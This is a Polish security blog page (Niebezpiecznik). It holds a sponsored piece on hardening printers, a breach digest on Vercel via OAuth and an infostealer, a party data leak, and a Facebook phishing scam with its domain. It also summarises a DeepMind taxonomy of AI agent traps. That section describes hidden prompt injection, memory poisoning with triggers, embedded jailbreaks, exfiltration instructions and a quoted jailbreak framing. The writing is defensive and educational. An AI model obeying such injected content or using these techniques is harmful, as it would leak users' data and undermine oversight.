– Największa różnica ‘po hardeningu’ to moment, w którym operacje na MFP przestają być anonimowe. Jeśli drukujesz, kopiujesz, skanujesz – to jest to przypięte do tożsamości – dodaje Daniel Mazur, Inforoffice Polska.

Po czwarte: Zamknij zbędne bramy. Mniej protokołów = mniej problemów

Teraz robisz ulubioną część adminów: redukcję powierzchni ataku. Wyobraź sobie MFP jako zamek. Jeśli masz 12 bram, to cyberninja nie musi być geniuszem – wystarczy, że jedna jest uchylona.

Twoje zadanie:

wyłącz protokoły, których nie używasz (serio, nie używasz),
zostaw tylko te, które są potrzebne do realnych procesów,
zabezpiecz panel administratora: tylko HTTPS i dostęp wyłącznie z określonych adresów/VLANów.
kontroluj pozostałą komunikację: skonfiguruj ACL/filtry IP i segmentację.

To jest dokładnie ta część, w której drukarka przestaje być „łatwym celem”.

Po piąte: “Szyfruj albo giń” + FIPS 140-3

Tu wchodzimy na poziom, gdzie nie da się już powiedzieć: „to tylko drukarka”. MFP przetwarza dane. Czasem bardzo wrażliwe.

To oznacza, że:

dane w spoczynku (na dysku),
dane w tranzycie (po sieci),
tożsamość i rozliczalność (kto, co, kiedy zrobił)

…muszą być chronione jak w każdej innej części IT.

FIPS 140-3 jest standardem certyfikacji modułów kryptograficznych. Nie chodzi o to, żebyś teraz recytował listę algorytmów. Chodzi o to, żeby kryptografia w urządzeniu była sprawdzalna, aktualna i sensownie wdrożona.

W praktyce:

szyfrujesz dane na dysku (żeby kradzież urządzenia nie była kradzieżą danych),
wymuszasz TLS/HTTPS (żeby wydruki i skany nie latały “plaintextem”),
spinasz urządzenie z katalogiem/SSO (żeby operacje były przypisane do użytkownika).

– Kryptografia i tożsamość to dwa filary. Jeśli drukujesz bez autoryzacji i bez szyfrowania, to nawet najlepszy firewall nie uratuje cię przed własną infrastrukturą – dodaje Dariusz Szwed, Canon Polska.

Po szóste:Posprzątaj po sobie. Bufory i historie to też dane

NIST 800-88 mówi o sanitizacji danych. Brzmi prawie tak samo jakbym mówił do Ciebie po japońsku?

W odniesieniu do MFP oznacza to: nie zostawiaj śladów, które ktoś może później wykorzystać przeciw Tobie.

Sprawdź/włącz:

automatyczne czyszczenie danych zadań i buforów,
nadpisywanie danych tam, gdzie jest wspierane,
sensowną retencję logów (żeby pomagały, a nie szkodziły).

To jeden z tych rytuałów, których znaczenia często się nie docenia, dopóki nie nadejdzie czas próby, a audyt lub incydent nie odsłoni prawdy…

Po siódme: Pokaż mi porty, a powiem ci, czy Twoja twierdza przetrwa oblężenie

Przed hardeningiem często zobaczysz:

dużo otwartych portów,
kilka aktywnych usług „bo tak”,
admina dostępnego z sieci użytkowników,
brak twardego wymuszenia szyfrowania.

Po wdrożeniu polityk w duchu NIST i FIPS:

portów robi się wyraźnie mniej (czasem drastycznie),
zostają tylko potrzebne usługi,
admin jest w kontrolowanej strefie,
komunikacja jest szyfrowana,
stare protokoły znikają.

To nie jest kosmetyka. To jest realna zmiana profilu obrony: ograniczona powierzchnia ataku, większa szansa na przetrwanie, gdy nocą do bram podejdzie wróg.

Security Settings Navigator oczywiście nie jest lekarstwem na wszystko.
Masz flotę? Potrzebujesz zarządzania.

Jeśli masz jedną drukarkę, możesz przemierzać drogę bezpieczeństwa jako wojownik samotnik, który zna każdy port, każdą usługę, każdy ruch maszyny. Jeśli masz ich 80… to już nie jest nawet dojo, tylko pełnowymiarowe pole bitwy, włączające konieczność strategicznego planowania.

Security Settings Navigator ma sens szczególnie dla małych środowisk lub pojedynczych urządzeń.

Przy dużej skali nie chodzi już tylko o ochronę. Chodzi o dyscyplinę – o to, by każde urządzenie, w każdej lokalizacji, działało zgodnie z jedną ścieżką, jednym kodeksem.

Do tego potrzeba już narzędzi zdolnych do:

masowych zmian konfiguracji,
weryfikacji zgodności,
aktualizacji,
raportów pod audyt

I ten wątek otwiera kolejną sagę o Samuraju, który strzeże firmowych danych.

Hardening jest rytuałem wejścia, a utrzymanie zgodności – dowodem, że wojownik pozostaje wierny swojemu przeznaczeniu.

Autorem niniejszego artykułu jest Canon Polska, producent i dostawca rozwiązań do druku i obiegu dokumentów, w których bezpieczeństwo jest elementem architektury, a nie dodatkiem. Artykuł jest artykułem sponsorowanym i za jego publikację otrzymaliśmy wynagrodzenie.Rozwiązania do druku od Canon Polska stawiają na bezpieczeństwo, co widać zarówno w zaawansowanych urządzeniach wielofunkcyjnych z serii imageFORCE, tworzonych z myślą o środowiskach o podwyższonych wymaganiach bezpieczeństwa, jak i laserowych drukarkach Canon iSENSYS, które już w podstawowej konfiguracji oferują szyfrowanie danych, silne mechanizmy uwierzytelniania i nowoczesne standardy sieciowe.

Partnerem merytorycznym artykułu jest także Inforoffice Polska
Akredytowany Partner Canon Polska. Integrator rozwiązań z zakresu druku, kopiowania, skanowania i cyfrowego obiegu dokumentów. Specjalizuje się we wdrażaniu bezpiecznych środowisk pracy z dokumentami, łącząc urządzenia Canon z systemami zarządzania dokumentami, kontroli dostępu i politykami bezpieczeństwa organizacji.

O czym pisaliśmy w zeszłym tygodniu, ale ❌ NIE na Niebezpieczniku?

2026-04-27T10:17:50Z

W jednym z ostatnich artykułów przypomnieliśmy, że nasza redakcja jest najbardziej aktywna na Twitterze. Część z Was zwróciła uwagę, że na Twittera nie zagląda i zasugerowała, aby publikować tu, na Niebezpieczniku, jakiś “skrót” tego o czym twitujemy. No więc oto pierwszy z takich skrótów, podsumowujący zeszły tydzień naszej aktywności na Twitterze (~40 wpisów, ~5 dziennie).

Zanim jednak do niego przejdziemy — słowo wyjaśnienia, dlaczego na Twitterze pojawiają się treści, których nie widać na Niebezpiecznik.pl.

Dlaczego Twitter?

Od zawsze staramy się, aby na Niebezpiecznika trafiały dłuższe, przemyślane i mocno merytoryczne publikacje. Bo Niebezpiecznik to serwis internetowy, a nie platforma społecznościowa. Nie każdy wpis z Twittera da się rozwinąć do tego typu formy — a na siłę nie ma sensu tego robić. Coś co może być jednym zdaniem, lepiej żeby pozostało jednym zdaniem, a nie przepełnionym miałką treścią artykułem na 15 akapitów. To pierwszy, najważniejszy powód. Drugim powodem jest to, że na Twitterze często podajemy lub “retwitujemy” dalej cudze treści bez jakiegokolwiek opisu. To zdecydowanie szybsze i mniej pracochłonne niż pełnoprawna publikacja na Niebezpieczniku.

I żeby było jasne — Twitter nie jest idealną platformą (wręcz jest bardzo nieidealną), ale ze uważamy, że jeśli chodzi o obszar IT Security, to ze wszystkich social mediów jest platformą najlepszą, jeśli chodzi o ilość i jakość wiedzy oraz prędkość jej pozyskiwania (jeśli się wie, kogo śledzić). Dlatego tych z Was, którzy zajmują się cyberbezpieczeństwem zawodowo, zachęcamy do obserwowania naszego profilu — abyście trzymali rękę na pulsie, bo to w naszej branży jest szalenie istotne. Np. opisywany przez nas tydzień temu na Twitterze hack Polymarketu suszarką niektóre serwisy opisuję dopiero dziś, po tygodniu…

Reszcie naszych Czytelników, mamy nadzieję, że wystarczą takie podsumowania jak to.

Dajcie znać, czy takie podsumowania jak to mają dla Was wartość? Czy mamy je kontynuować? A może wyobrażacie sobie je inaczej? Jeśli tak — co dodać, co zmienic?

Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!

2026-04-21T11:40:24Z

Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych “technicznych” firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej grupie oraz plujący jadem internetowi przeciwnicy vibecodingu, którzy z widłami poszli na firmę, bo przecież wiadomo, że “każdy programista AI to debil”. A okazało się, że AI nie miało z tym atakiem niczego wspólnego.

Od czego się zaczęło?

19 kwietnia na znanym hackerskim forum pojawiła się informacja o tym, że popularna wśród vibecoderów platforma Vercel została zhackowana. Atakujący podpisujący się jako ShinyHunters wystawili na sprzedaż klucze i dostępy do bazy danych firmy. Zrobiło się gorąco w środowisku, bo Vercel stoi też za narzędziem v0 oraz popularną biblioteką Next.js, a to od razu przywołało ostatnie głośne ataki supply chain.

Na początku oczywiście spekulowano, że przełamanie zabezpieczeń to wynik użycia beztroskiego vibecodingu do budowy i konfiguracji mechanizmów bezpieczeństwa Vercela. Bo firma z vibecodingiem jest kojarzona. Ale prawda okazała jeszcze bardziej bolesna. Źródłem ataku był łańcuch dwóch pracowników.

Pierwszy to pracownik zewnętrznej firmy — Contex.ai, który pobierał …cheaty do gry Roblox zainfekowane infostealerem Lumma. Dzięki temu atakujący mieli dostęp do infrastruktury firmy Contex.ai oraz danych jej klientów. Dwa miesiące temu 17 lutego. Poniżej widok tego, co infostealer wystawiał z jego hosta:
Drugi to pracownik Vercela, który korzystał z narzędzi Contex.ai, ale zalogował się do nich ze swojego służbowego konta Google Workspace, dając im poprzez OAuth pełne uprawnienia (“allow all”) do środowiska Vercela.

Infekcja pierwszego pracownika dała atakującym dostęp do jego uprawnień w różnych usługach (Supabase, Datadog, Authkit) oraz do skrzynki support@contex.ai, dzięki której udało się im “zpivotować” do infrastruktury Vercela. Żadnego przejęcia hasła. Żadnego phishingu. Żadnego exploita. Kurtyna.

Jeśli nie chcesz, by jeden nieostrożny pracownik albo błędnie skonfigurowane środowisko pracy rozłożyło Twoją firmę na łopatki, to zapisz swój zespół na nasze szkolenie z bezpieczeństwa dla programistów lub administratorów! Pokazujemy na takim szkoleniu w praktyce, jakich błędów uniknąć, żeby nie znaleźć się na czołówkach gazet i nie musieć wysyłać zgłoszeń do RODO oraz listów z frazą “bezpieczeństwo jest dla nas najważniejsze, ale…” do Klientów ;)

Żeby było weselej, grupa ShinyHunters stwierdziła na swoim kanale na Telegramie, że ktoś się pod nich podszywa (zapewne aby podnieść wiarygodność swojego ogłoszenia) a oni żadnych dostępów do Vercela nie sprzedają.

Jak sprawdzić, czy nie macie takich pracowników u siebie w firmie?

Jeśli korzystacie z Google Workspace, sprawdźcie czy też przypadkiem nie macie “zbyt szerokich dostępów” wpiętych po OAuth do swojej infrastruktury. W tym celu zaloguj się do panelu Google Admin Console i wejdź w sekcję Security. A potem Access and Data Control -> API Controls -> Manage app access -> Accessed Apps. Tu widać wszystkie aplikacje mające dostęp do Waszego środowiska. Warto sprawdzić, czy nie ma wśród nich dokładnie tej, która “zhackowała” Vercela. Aby to zrobić, wystarczy przefiltrować listę po ID aplikacji:

"110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent[.]com"

Jeśli zobaczysz tę aplikację na liście — oznacza to, że Twój firmowy Workspace może mieć nieproszonych gości. Należy niezwłocznie usunąć dostępy, rozpocząć procedurę analizy logów audytowych i zrotować adekwatne tokeny i hasła.

Może warto też na przyszłość ograniczyć możliwość uwierzytelniania się po OAuth niektórym pracownikom/aplikacjom? Jest więcej niż pewne, że Wasi współpracownicy korzystają z kont służbowych do logowania się w usługach firm trzecich, zostawiając tam tokeny, które mogą dać komuś dostęp do Waszej infrastruktury… Nie mówiąc już o naruszeniach umów o poufność i wysyłaniu danych osobowych poza EOG. Jeśli zarządzasz IT w jakiejś firmie, warto to (i nie tylko to) ryzyko zaadresować jak najszybciej, a my możemy w tym pomóc. Jeśli nie wiesz od czego zacząć albo jak poprawnie ułożyć cyberbezpieczeństwo w firmie od zera, daj nam znać — pomożemy!

A jeśli korzystasz z Vercela, to dobrym pomysłem będzie rotacja wszystkich sekretów, “sensitive variables” i rozważenie korzystania z zewnętrznych Secret Managerów na przyszłość.

Vercel informuje klientów

W sieci pojawiła się wypowiedź CEO Vercela z opisem ich ustaleń. Są też gorzkie słowa ze strony Contex.ai:

Vercel is not a Context customer, but it appears that at least one employee enabled “allow all” on all requested Google Workspace permissions using their Vercel Google Workspace account. These permissions were intended to grant AI agents the ability to perform Google Workspace actions such as writing emails or creating documents on the grantee’s behalf.

Nie zwalajcie winy na AI (w tym przypadku)

Opisywany incydent idealnie wpisuje się w to, co omawialiśmy niedawno w artykule pt. To nie AI jest największym zagrożeniem. Mimo że w nagłówkach portali królują dziś przerażające hasła o “śmiercionośnych skutkach korzystania z AI”, to tu wektorem ataku był błąd pracownika (dlatego warto ich edukować pod kątem dobrych praktyk cyberbezpieczeństwa) — zaniedbanie, połączone z trywialnym złośliwym oprogramowaniem i brakiem egzekwowania reguły najmniejszych uprawnień (Least Privilege) oraz detekcji tego typu infekcji i braku kontrolowania “shadow IT / shadow AI”.

Narzędzia bazujące na sztucznej inteligencji, z których coraz częściej korzystają firmy działają “w chmurze” dokładnie tak, jak nieejajowe konta usługowe. I tak samo jak w przypadku wszystkich innych usług firm trzecich, bezwzględnie wymagają pełnej kontroli, audytu logów i zasady ograniczonego zaufania. Tu odsyłany do naszego cyklu poświęconego budowie SOC, który takie nadużycia pomaga wychwytywać.

“Ssijcie ruskiego k…” czyli partia Mentzena zhackowana po raz 3

2026-04-20T08:34:44Z

Po raz trzeci dane członków oraz nieletnich sympatyków partii Mentzena zostały wykradzione i upublicznione w sieci. Tym razem włamywacz opublikował 500 rekordów zawierających:

imię i nazwisko
PESEL
adres zamieszkania
numery telefonów

Wyciekły też dane osób oznaczonych jako “nieaktywne” ponieważ wciąż znajdowały się w bazie danych. Dodatkowo upubliczniona paczka zawiera treści SMS-ów, e-maili i dokumentów.

To nie pierwszy hack partii Mentzena

Przypomnijmy, że pierwszy z ataków zakończony wyciekiem danych Nowej Nadziei miał miejsce 16 marca 2025, a drugi 4 sierpnia 2025. Partia Mentzena do dziś nie odpowiedziała nam na pytania w sprawie ataków. Można też przypuszczać, że niewiele też poczyniono aby lepiej zabezpieczyć dostęp do danych.

Nie zdziwilibyśmy się, gdyby przyszło nam jeszcze w tym roku, po raz czwarty, opisywać kolejny incydent związany z tą partią…

Aktualizacja (20.04.2026 10:33)
Rzecznik prasowy Nowej Nadziei na Twitterze poinformował, że “sprawa dotyczy starego, nieaktualnego systemu, dotyczy sekcji młodzieżowej w jednym regionie w Polsce (Białystok)”.

Jak uchronić się przed takimi atakami?

Jeśli chcesz zabezpieczyć się przed atakami na swoje serwery i webaplikacje, zapraszamy na nasze bestsellerowe szkolenie, a raczej 3 dniowe, pełne praktyki warsztaty, które nauczą Cię jak samodzielnie wykonywać testy penetracyjne. Dzięki niemu wykryjesz dziury w swojej infrastrukturze zanim ktoś zrobi to za Ciebie i opublikuje w internecie dane Twoich klientów lub użytkowników — oto najbliższe terminy:

Kraków: 13-15 maja 2026r. — UWAGA: zostały tylko 3 wolne miejsca
Ostatnio ktoś zarejestrował się 10 kwietnia 2026r. → zarejestruj się na to szkolenie

Wrocław: 17-19 czerwca 2026r. — zostało 6 wolnych miejsc
Ostatnio ktoś zarejestrował się 18 marca 2026r. → zarejestruj się na to szkolenie

Warszawa: 01-03 lipca 2026r. — zostało 7 wolnych miejsc
Ostatnio ktoś zarejestrował się 26 kwietnia 2026r. → zarejestruj się na to szkolenie

ZDALNIE: 26-28 sierpnia 2026r. — zostało 9 wolnych miejsc
Ostatnio ktoś zarejestrował się 30 marca 2026r. → zarejestruj się na to szkolenie

Naprawdę dobrze dopracowany atak na właścicieli stron na Facebooku

2026-04-17T09:32:58Z

Dziś na naszą redakcyjną skrzynkę spłynął ciekawy i — podkreślmy — prawdziwy e-mail od Mety, właściciela Facebooka:

Wczujcie się w administratora jakiegoś fanpage. E-mail dotyczy blokady strony w ciągu 24 godzin. E-mail jest wysłany z prawdziwego adresu i nie wpada do spamu. E-mail trafia na adres przypisany do danego fanpage (atakujący nie zna tego adresu, wiadomość wysyła Facebook na niepubliczny e-mail podany przez administratora strony). Ten atak jest — przynajmniej na tym etapie bardzo wiarygodny.

Ale to jest przekręt.

Atakujący sprytnie wykorzystuje to, że Facebook rzeczywiście wysyła takie maile w momencie prośby o dostęp do czyjegoś Business Portfolio. Co więcej, umożliwia wplecenie w nie fragmentów tekstu kontrolowanego przez atakującego, i jak widać powyżej, nie oznacza wyraźnie, które z fragmentów są dodane przez wnioskującego o dostęp.

Czy jesteście w stanie ustalić samodzielnie, które fragmenty e-maila to treść podstawiona przez atakującego?

Co się stanie, jeśli ktoś kliknie w link?

Kliknięcie w pierwszy z linków spowoduje przeniesienie ofiary na stronę wyglądem przypominającą serwisy Mety i zawierającą formularz, który wyłudza dane osobowe oraz login i hasło.

Jeśli ktoś uzupełni te dane, bo uwierzy w treść autentycznego (!) e-maila od Facebooka, to straci swoje konto.

Na koniec dodajmy, że domena używana do tego ataku zostałą założona dziś i jest schowana za Cloudflare:

Domain Name: INFORMATION-CENTER-ONLINE.HELP (188.114.96.11, 188.114.97.11) Creation Date: 2026-04-17T04:45:53.0Z Name Server: ALEENA.NS.CLOUDFLARE.COM Name Server: VICKY.NS.CLOUDFLARE.COM

Co robić, jak żyć?

Ostrzeżcie przed tymi e-mailami swoich kolegów i koleżanki z firmowych zespołów social media i wszystkich znajomych, którzy prowadzą fanpages na Facebooku. Wyślijcie im linka do tego posta — no i do naszego Facebooka też :) A jeśli chcecie przeszkolić swoich pracowników z cyberbezpieczeństwa, aby takie — i jeszcze bardziej zaawansowane ataki wykrywali sami — to rzućcie okiem na tematy naszych cyberwykładów z którymi możemy przyjechać do Waszej firmy albo na Wasz wyjazd integracyjny :)

Jak można wykiwać Twoje agenty AI oraz boty AI kradnące treści z Twojej strony?

2026-04-07T09:45:28Z

Wstrzykiwanie wrogich, czyli zapętlonych hiperlinkami miałkich treści, które mają zapchać i ogłupić AI, to tylko jeden ze sposobów oszukiwania agentów AI wchodzących na strony internetowe. Oczywiście treści te nie są widzialne dla zwykłych użytkowników. A jakie są inne sposoby wystrychiwania AI na dudka? I czy mogą one wpływać tylko na konkretne agenty? Próbę stworzenia klasyfikacji “pułapek na AI” podjęli badacze z Google DeepMind.

“Ić stont bocie!”

Nie od dziś wiadomo, że agenty AI da się zmanipulować. Można ukrywać niebezpieczne polecenia dla AI w instrukcjach formatowania Markdown albo LaTeX (tzw. (indirect) prompt injection). Można też zatruwać wiedzę w systemach RAG albo tworzyć tzw. pułapki przeciążeniowe. Co jakiś czas trafiamy na publikacje dotyczące takich rzeczy i czasami mają one charakter zaledwie ciekawostki i o takich piszemy tylko na naszym Twitterze — w ogóle to tam publikujemy najwięcej i najczęściej, umieszczamy tam treści, których nie znajdziecie na żadnym innym naszym kanale w social mediach — więc dodajcie nas do obserwowanych na Twitterze). Ale innym razem obserwacje z tego tematu dotykają naprawdę poważnych zagrożeń.

Piątka badaczy z Google DeepMind podjęła próbę stworzenia klasyfikacji Pułapek na Agenty AI (AI Agent Traps). Klasyfikacja bazuje na funkcjach agentów AI, w które wymierzone są ataki. Sami badacze podkreślają, że klasyfikacja doskonała nie jest, gdyż prawdziwe ataki mogą wykorzystywać wiele mechanizmów jednocześnie. Badacze zaproponowali podział pułapek na 6 kategorii, które opisujemy poniżej.

Co każdy pracownik powinien wiedzieć o AI?

Czy korzystanie z AI w firmie stanowi zagrożenie?
Czy pracownicy powinni obawiać się ataków “deepfejkiem na prezesa“?
Czy księgowa powinna dovibecodować sobie brakujące funkcje do Excela?
Do jakich służbowych zadań nigdy nie wolno użyć AI, a jakie wręcz należy AI powierzyć?

Dokładnie o tym od 2 lat opowiadamy podczas wykładów realizowanych dla polskich i zagranicznych spółek. Konkretnie, merytorycznie i bez hajpu, ale z humorem i przykładami konkretnych narzędzi i zastosowań AI — tych dobrych i tych złych. Jeśli chcesz zaktualizować wiedzę swoich (współ)pracowników w temacie AI (zarówno ryzyk, zagrożeń jak i korzyści oraz benefitów), to zaproś nas do swojej firmy. W godzinę otworzymy Wam oczy i gwarantujemy, że niektórzy uczestnicy wykłady nie będą chcieli ich zamknąć ich przez najbliższe tygodnie (lub do wyczerpania przysługujących im tokenów/limitów na AI, cokolwiek nastąpi wcześniej :). Aby otrzymać agendę wykładu, napisz na szkolenia.ai@niebezpiecznik.pl lub zadzwoń 12-44-202-44.

Content Injection Traps (wstrzykiwanie treści)

W rozumieniu badaczy jest to „atak na percepcję” agentów. Do tej grupy “pułapek” zaliczamy osadzanie poleceń dla AI np. wewnątrz kodu CSS lub w komentarzach HTML (badacze użyli tu terminu Web-Standard Obfuscation). Również do tej grupy zaliczono wykorzystywanie składni języków formatowania (np. Markdown czy LaTeX-a) w celu przemycenia złośliwych instrukcji (tzw. Syntactic Masking). Takie rzeczy są zazwyczaj niewidoczne dla ludzi, ale mogą być parsowane i przetwarzane przez agenty AI.

Jeden ze starszych, ale dobrze wizualizujących tę technikę przykładów.

Do ataków na percepcję zaliczono też użycie steganografii w celu ukrycia złośliwego komunikatu oraz tzw. Dynamic Cloaking, czyli wykrywanie, że odwiedzającym jest agent AI i warunkowe wstrzykiwanie szkodliwych treści, których zwykli użytkownicy nie zobaczą.

Semantic Manipulation Traps (manipulacje semantyczne)

To ataki, które są wycelowane w “rozumowanie” agenta. Chodzi o manipulowanie informacjami syntetyzowanymi przez agenty w celu skłonienia ich do sformułowania wniosków zgodnych z celami napastnika. Do tej grupy “pułapek” zaliczamy m.in. wypełnianie tekstu źródłowego starannie dobranym, w określony sposób nacechowanym emocjonalnie albo stronniczym językiem. Wówczas u modeli LLM pojawiają się błędy poznawcze podobne do ludzkich. Inne pułapki z tej kategorii obejmują opakowywanie złośliwych instrukcji w ramy edukacyjne lub hipotetyczne w celu ominięcia filtrów (np. “powiedz mi jak zrobić [TU WSTAW ZAKAZANĄ RZECZ], abym tego nie powtarzał”).

Cognitive State Traps (zatruwanie wiedzy/pamięci)

To ataki, które są wycelowane w “uczenie się” i pamięć agenta, czyli m.in. zatruwanie wiedzy (knowledge poisoning) w systemach RAG (Retrieval-Augmented Generation). Zjawisko to wykorzystuje fakt, że systemy RAG ufają dokumentom zewnętrznym bardziej niż własnej wiedzy wyuczonej, więc jeśli napastnik “zatruje” bazę danych (np. wewnętrzne repozytorium firmy), model zacytuje kłamstwo jako źródło prawdy. W praktyce osoby o złych intencjach mogą dokonać wstrzyknięcia danych do źródeł AI poprzez publikowanie wrogich treści w publicznych zasobach internetowych (np. Reddit), które są celem robotów indeksujących (scrapers), lub poprzez przesyłanie “zatrutych” plików do współdzielonych repozytoriów korporacyjnych, które agent automatycznie indeksuje.

Do tej samej grupy pułapek badacze zaliczyli Latent Memory Poisoning, czyli ataki z uśpionym agentem. Dane wstrzyknięte do pamięci długotrwałej agenta mogą wyglądać normalnie, dopóki nie pojawi się specyficzny wyzwalacz (trigger). Wtedy model “przypomina sobie”, że jest zły i zaczyna działać na korzyść atakujących. Kolejny rodzaj ataków w tej grupie to Contextual Learning Traps. Chodzi o wykorzystanie zdolności modeli do nauki na przykładach podanych w zapytaniu (few-shot learning). Napastnik podaje kilka przykładów poprawnych interakcji, które są subtelnie skrzywione, a model zaczyna powielać błędy lub stronniczość.

Behavioural Control Traps

To ataki, które są wycelowane w działanie agenta, m.in. tzw. osadzone sekwencje jailbreak (Embedded Jailbreak Sequences). Samo słowo Jailbreaking w kontekście LLM odnosi się zazwyczaj do “wrogich” danych wejściowych, które mają ominąć mechanizmy dopasowania bezpieczeństwa. Jednak jailbreaking “osadzony” polega na ukryciu sekwencji w zasobach zewnętrznych, które agent konsumuje podczas normalnej pracy. Znów jest to więc coś na kształt indirect prompt injection. W momencie pobrania polecenie trafia do okna kontekstowego agenta, skutecznie nadpisując jego mechanizmy bezpieczeństwa w celu wprowadzenia go w stan pozbawiony ograniczeń. Do tej grupy pułapek zaliczymy więc polecenia eksfiltracji osadzone w wiadomościach e-mail czy w odpowiedziach API. Ataki te mogą również wykorzystywać zdolność agenta do korzystania z narzędzi, np. agent może wysłać e-mailem dane finansowe, medyczne lub behawioralne do napastnika.

Inne pułapki tego typu to – według badaczy – Sub-agent Spawning Traps. Polegają one na wykorzystaniu uprawnień (tzw. orchestratora) do tworzenia podagentów kontrolowanych przez napastnika wewnątrz zaufanego przepływu sterowania.

Systemic Traps (pułapki na systemy)

Do tej grupy zaliczono ataki, które są wycelowane nie w pojedyncze agenty ale w środowiska łączące wiele agentów. To bardzo ciekawe zagadnienie. Generalnie odnosi się do tego, że złe zachowanie pojedynczego agenta nie jest dużym problemem, ale jeśli wszystkie agenty powtarzają to zachowanie, to mamy duży problem. W tej grupie zagrożeń badacze wyróżnili m.in. Congestion Traps (pułapki przeciążeniowe). Wyobraźmy sobie, że nagle wszystkie nawigacje kierują pojazdy w okolicy na jedyną niezakorkowaną drogę. To mniej więcej ten problem. Zdaniem badaczy atakujący mogą to wykorzystać np. nadając specjalnie spreparowany komunikat wywołujący zsynchronizowaną wyprzedaż wśród agentów finansowych.

Inny typ takiej pułapki to Interdependence Cascades (kaskada współzależności). Działanie jednego agenta może zmienić środowisko, ale zmiana ta jest następnie postrzegana jako nowy sygnał przez inne agenty, których reakcje jeszcze bardziej modyfikują środowisko. Coś w rodzaju giełdowego zjawiska flash crash ale bez jawnej komunikacji między agentami (Tacit Collusion traps). Albo tzw. Sybil Attacks, czyli atak polegający na wprowadzeniu do systemu własnych agentów udających zaufane jednostki.

Human-in-the-Loop Traps (pułapki na człowieka)

Ostatnia grupa pułapek to ta, która jest wycelowana w ludzkiego nadzorcę systemów AI. Do takich ataków zaliczymy np. podawanie przez AI instrukcji postępowania (np. po ataku ransomware), które to instrukcje bardziej pomogą atakującemu niż ofiarom. Tu jednak badacze podkreślają, że literatury na ten temat jest mało, a zachowania ludzi są wysoce nieprzewidywalne. Zdecydowanie jest to obszar do dalszego badania.

Mam swojego agenta AI – co robić, jak żyć?

Dla zwykłego użytkownika AI powyższa klasyfikacja może być… ciekawym materiałem do przemyśleń. Dla specjalistów może to być punkt wyjścia do dyskusji o tworzeniu warstw w systemie bezpieczeństwa swoich agentów AI (aby nie dało się zmanipulować). Ten system powinien obejmować zabezpieczenia techniczne, i to różne, bo działające zarówno przy trenowaniu, jak i przy używaniu modeli (skanery treści, monitory wejścia itd.).

Z kolei dla właścicieli różnych zasobów, które agenty AI odwiedzają aby wykonać jakąś czynność (lub po prostu ukraść wiedzę) może to być poradnik, jak agentom zagrać na nosie… Pytanie jakie się nasuwa, to czy nie potrzebujemy już rozwiązań prawnych, np. w dziedzinie odpowiedzialności finansowej za skutki działania popsutego agenta? W pewnym sensie artykuł Google DeepMind stawia więcej pytań niż odpowiedzi, ale to właśnie dobrych pytań możemy teraz bardzo potrzebować…

PS. Potrzebujesz przeszkolić swoich (współ)pracowników z bezpiecznego i sensownego korzystania z narzędzi AI? Mamy dokładnie takie szkolenie! Napisz do nas na szkolenia.ai@niebezpiecznik.pl lub zadzwoń 12-44-202-44 aby otrzymać jego agendę.

Duże firmy przyuczają ludzi do phishingu (po tym jak przed nim ostrzegały)

2026-04-02T11:36:42Z

Co łączy dostawcę gazu, firmę telekomunikacyjną i centrum medyczne? Takie firmy wysyłają do swoich klientów maile z linkami do płatności. Niestety nie służy budowaniu dobrych nawyków w przeciwdziałaniu phishingowi. Niewiele też wskazuje na to, aby to się miało zmienić.

Problem linków w e-mailach

To jest na swój sposób fascynujące. Firmy płacą za szkolenia z bezpieczeństwa. Banki prowadzą kampanie edukacyjne przeciwko phishingowi. Nawet państwo inwestuje w materiały edukacyjne, które mają wszystkich obywateli nauczyć jednego — nie wpisuj hasła w formularzu logowania, jeśli na stronę trafiłeś przez kliknięcie w link z e-maila.. Edukacja w tym zakresie jest prowadzona od wielu lat, bo to jedno z najstarszych i najczęstszych oszustw internetowych. A jednocześnie najbardziej skutecznych.

Bo ludzie nie zawsze potrafią zorientować się, że e-mail nie pochodzi od tego, za kogo podaje się nadawca.
Bo ludzie nie potrafią też zauważyć literówki na pasku adresowym przeglądarki (lub w ogóle na niego nie patrzą) po kliknięciu w linka z e-maila.

Wszystkim byłoby łatwiej, gdybyśmy materiałach edukacyjnych mogli napisać coś w stylu

“żadna uczciwa firma nie będzie Cię zachęcać w e-mailu do logowania (lub płatności) przez kliknięcie w link”

Dobre praktyki rynkowe są stosowane przez niektórych — zwróćcie uwagę jak w tym zakresie wygląda komunikacja od banków. W e-mailach jest najcześciej zwrot typu “zaloguj się na swoje konto, potem przejdź na zakładkę X aby aktywować Y”, ale bez linka. Klient przecież wie (powinien wiedzieć) jak się zalogować do usługi z której korzysta, a brak linka skłania go do samodzielnego wpisania adresu strony internetowej lub uruchomienia aplikacji. Tak, może ją wpisać z literówką. Tak, może ją wygooglać i trafić na lewą stronę. Ale te ryzyka nie prowadzą do tylu ofiar co phishing i można je szczelniej kontrolować, niż przyzwyczajenie klienta do “klikam w każdy link i wpisuję dane”.

Nie wiemy ile firm zachęca w swojej komunikacji do klikania w linki z e-maila prowadzące do logowania lub płatności, ale sami natknęliśmy się w ostatnim czasie na trzy przykłady.

Zagrożeń czyhających na internautów jest zdecydowanie więcej. O wszystkich opowiadamy w trakcie 3-godzinnego wykładu “Jak nie dać się zhackować?“. To nasz najlepszy wykład o cyberbezpieczeństwie dla każdego. Średnia ocena: 9,48/10. A oto terminy najbliższych wykładów:

Zobacz pełną agendę tego wykładu i reakcje uczestników poprzednich edycji.

PS. Można (a nawet powinno się) na ten wykład wysłać lub przyjść z nietechnicznymi znajomymi!

Lux Med

Przypadek numer 1: Grupa Lux Med. Osoby, które zarejestrowały się na wizytę lekarską w zakładzie tej firmy otrzymywały takiego oto maila z potwierdzeniem.

E-mail z Luxmed (wbrew pozorom nie scam)

Kliknięcie w link w e-mailu przekierowuje na stronę Luxmedu, która z kolei przekierowuje do bramki płatności PayU. Schemat wykorzystywany w wielu oszustwach internetowych “na dopłatę”.

Drugi przypadek: Vectra – dostawca internetu i innych usług telekomunikacyjnych. Klienci tej firmy po wystawieniu rachunku mogą otrzymać taki e-mail:

Mail od Vectry

Link w mailu kieruje do eBok, a zaraz potem następuję przekierowanie do płatności.

